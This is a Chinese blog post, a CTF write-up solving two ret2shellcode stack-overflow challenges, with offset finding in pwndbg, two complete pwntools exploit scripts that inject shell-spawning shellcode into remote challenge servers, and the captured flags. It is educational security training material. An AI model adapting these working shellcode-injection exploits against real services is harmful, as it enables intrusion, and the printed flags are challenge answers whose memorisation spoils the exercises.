[第十五章][15.3.2 shellcode注入攻击]ret2shellcode+[NewStarCTF 公开赛赛道]ret2shellcode

已于 2025-04-30 18:29:24 修改
阅读量506 收藏 4
点赞数 7
分类专栏: PWN67 文章标签: CTF pwn ret2shellcode c语言 汇编 安全 栈溢出
于 2025-04-30 18:24:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/147637374
版权

1、[NewStarCTF 公开赛赛道]ret2shellcode

IDA 反编译看伪代码:

buf = mmap((void *)0x233000, 0x1000uLL, 7, 34, -1, 0LL);

这里直接给了 buf 7 的权限,即可读可写可执行,那么 shellcode 肯定写到 buf 里

buf 的映射地址:0x233000

下面的 v4 存在溢出,那么利用思路就很明显

覆盖返回地址到 buf 地址就可以了

先拿 pwndbg 判断一下偏移:

cyclic 200

我们利用的溢出点在 v4,是第二次的 read,所以第一次随便输,第二次输入测偏移。

aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

拿到返回的报错地址:0x6161616161616168 

查一下偏移:

cyclic -l 0x6161616161616168

到返回地址的偏移是 56

接下来就可以直接写 exp 了:

# @author:My6n
# @time:20250430
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('node5.buuoj.cn',26272)
shellcode = asm(shellcraft.sh())
offset = 56
io.sendline(shellcode)
io.recvuntil('Anything else?\n')
buf_addr = 0x233000
payload = cyclic(offset) + p64(buf_addr)
io.sendline(payload)
io.interactive()

调试信息: 

拿到 flag:flag{8aeab6ad-2924-49cd-a4ca-a8de7ec8c684} 

2、[第十五章][15.3.2 shellcode注入攻击]ret2shellcode

看一下伪代码:

程序会直接输出 v4 的地址,我们将 shellcode 写到 v4,然后溢出返回到 v4 的地址即可

利用思路也很简单,我们测一下偏移:

偏移是 104,再提取一下 v4 的地址就可以了

编写 exp:

# @author:My6n
# @time:20250430
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('node5.buuoj.cn',29764)
offset = 104
shellcode = asm(shellcraft.sh())
io.recvuntil('advance ')
ret_addr = io.recvline()[:14]
print(ret_addr)
ret_addr = int(ret_addr,16)
print(ret_addr)
payload = shellcode.ljust(offset,b'A') + p64(ret_addr)
io.recvuntil('write last things:\n')
io.sendline(payload)
io.interactive()

调试信息: 

拿 flag

flag{711ede95-7327-47f9-b714-f3ff81763509}

(shellcode注入攻击)ret2shellcode-栈上的ret2shellcode
2401_83500274的博客
08-14 787
用64ida打开发现如下情况,他输出了v4的地址,然后shift+F12没有发现什么后面函数和bin/sh字样,所以我们可以考虑用栈上的ret2shellcode来写。v4_addr = int(r.recvline()[33:-1],16)#这里接受的是printf里的,并且进行了切片操作,使得位v4地址并且转换为10进制。ret2shellcode的题,大致为bss段上的和栈上的shellcode。生成64位的shellcode,接收v4的地址,利用ljust覆盖填充,返回v4的地址。
Ret2ShellCode详解
Sakura给爷pwn全场
10-24 516
StackOverFlow之Ret2ShellCode详解: https://www.freebuf.com/vuls/179724.html https://www.jianshu.com/p/7dad572adae9
ret2shellcode
weixin_56301399的博客
07-20 631
基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。
ret2shellcode的初相识
gclome的博客
07-29 779
本文首发于freebuf,是自己发在安全媒体的第一篇文章 发现freebuf的网名好像不可以修改,后悔当时随便起的这个名字了!害~ 0x00 ret2shellcode简介 ret2shellcode,也就是return to shellcode,在执行完某个函数之后,跳到shellcode上,达到get shell的目的。 ret2shellcode关键在于我们找到一个可读可写可执行的缓冲区,接下来把我们的shellcode放到这个缓冲区,然后跳转到我们的shellcode处执行 。 0x01 示例一 先
栈溢出入门(ret2shellcode漏洞)
2301_80718478的博客
07-05 1053
ret2shellcode,即控制程序执行 shellcode代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码,然后通过利用,让程序调到shellcode的地址后去执行这里为了学习shellcode漏洞,龙哥更新了源码:这里是依次获取两个字符串并输出。
ret2shellcode 学习
akdelt的博客
01-24 800
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 986
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
python函数式编程 第2版 pdf_Python函数式编程 第2
weixin_35691102的博客
02-20 1125
前言第 1章 函数式编程概述 11.1 编程范式 11.2 细分过程范式 21.2.1 使用函数式范式 31.2.2 使用混合范式 51.2.3 对象的创建过程 61.2.4 乌龟塔 71.3 函数式编程经典示例 71.4 EDA 101.5 小结 10第 2章 函数式编程的特点 112.1 头等函数 112.1.1 纯函数 122.1.2 高阶函数 132.2 不可变数据结构 132.3 严格求...
linux iopen i2c dev,《Linux4.0设备驱动开发详解》札记-第十五章:Linux I2C核心、总线与设备驱动...
weixin_32200879的博客
05-17 264
15.1 Linux I2C体系结构I2C核心I2C核心提供了I2C总线驱动和设备驱动的注册、注销的方法,I2C通信(Algorithm)方法上层的与具体适配器无关代码以及探测设备、检测设备地址的上层代码等I2C总线驱动是对I2C体系结构中适配器端的实现,适配器可由CPU控制,甚至可以直接集成在CPU内部总线驱动包含I2C适配器数据结构i2c_adapter、I2C适配器的Algorithm数据结...
2018年秋八年级数学上册第十五章分式15.3分式方程15.3.2列分式方程解决实际问题课时作业新版新人教版2018082315
09-10
2. **购物问题**:涉及到商品价格变化和数量增减的问题。例如,第一次购买某商品的成本和数量,第二次购买时价格降低,但购买数量增加。通过列出分式方程,可以求解出初始购买的数量。 3. **速度与时间问题**:如...
15.3.2_分式方程的应用2
11-19
2\left(\frac{1}{x}+\frac{1}{x+3}\right) + (x-2)\cdot\frac{1}{x+3} = 1 \] - 化简并解方程,得\(x=6\)。 - **结论**:规定日期是6天。 **案例2:列车提速问题** - **题目描述**:从2004年5月起,某列车平均...
第十五章 开发XFire Web Service应用.pdf
01-11
### 第十五章 开发XFire Web Service应用 #### 15.1 引言 ##### 15.1.1 WebService简介 WebService(通常译作Web服务)是由微软和IBM等公司共同提出的一项技术规范,它允许在互联网上通过标准的协议(如HTTP)...
第十五章 开发XFire Web Service应用22.pdf
01-11
### 第十五章 开发XFire Web Service应用22.pdf 知识点解析 #### 15.1 引言 ##### 15.1.1 WebService简介 WebService,中文通常译为Web服务,最初由IBM和微软共同提出的技术规范。它的核心在于提供一个标准化的...
openstack-neutron-ml2-15.3.2-1.el7.noarch.rpm
12-28
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
strings.TrimLeftFunc 使用详解
幸享龙枫的博客
04-27 1543
从字符串 s 的左侧(开头)连续删除满足函数 f(rune) bool 条件的 Unicode 字符,直到遇到第一个不满足条件的字符为止;支持任意复杂的字符判断逻辑;正确处理多字节字符;可通过函数组合实现复杂条件
GCC 内建函数汇编展开详解
weixin_39145568的博客
04-27 1003
A. 定义与目的GCC 提供了大量的内建函数,其设计目的主要是为了优化。这些函数由编译器直接识别和处理,使得编译器能够利用其对函数语义的深刻理解来生成更高效的代码,这通常是标准库函数调用无法比拟的。编译器知道内建函数的具体行为、副作用以及可能存在的简化或特殊实现方式。例如,某些内建函数可以直接映射到目标处理器的特定高效指令。B. 与标准库函数的区别标准库函数(如printfmemcpy)通常存在于外部库(如 libc)中,有独立的函数入口点,其地址可以获取。
基于STM32、HAL库的ATECC608B安全验证及加密芯片驱动程序设计
corlin6688的博客
04-29 197
注意:ATECC608B的I2C地址通常是0x60(7位地址)基于硬件的高安全性加密算法。ECC P-256加密引擎。真随机数生成器(TRNG)I²C接口(最高1MHz)低功耗设计,适合物联网应用。SHA-256哈希算法。16KB安全存储空间。
芯片软错误概率探究:基于汽车芯片安全设计视角
最新发布
ANSILIC的博客
04-30 1113
本文深入剖析了芯片软错误概率问题,结合 AEC-Q100 与 IEC61508 标准,以 130 纳米工艺 1Mbit RAM 芯片为例阐述其软错误概率,探讨汽车芯片安全等级划分及软错误对汽车关键系统的影响,分析先进工艺下软错误变化趋势,并提出相应的应对策略,旨在为芯片在汽车等安全关键领域的应用提供理论参考与实践指导,保障电子系统可靠性。
网络安全漏洞现状与风险管理分析
weixin_43172311的博客
04-27 764
在当今数字化时代,网络安全已成为企业和组织不可忽视的核心问题。网络环境的日益复杂和攻击手段的不断升级,使得漏洞管理成为网络安全战略中的关键环节。下面将详细分析当前网络安全领域的漏洞现状及有效的风险管理策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值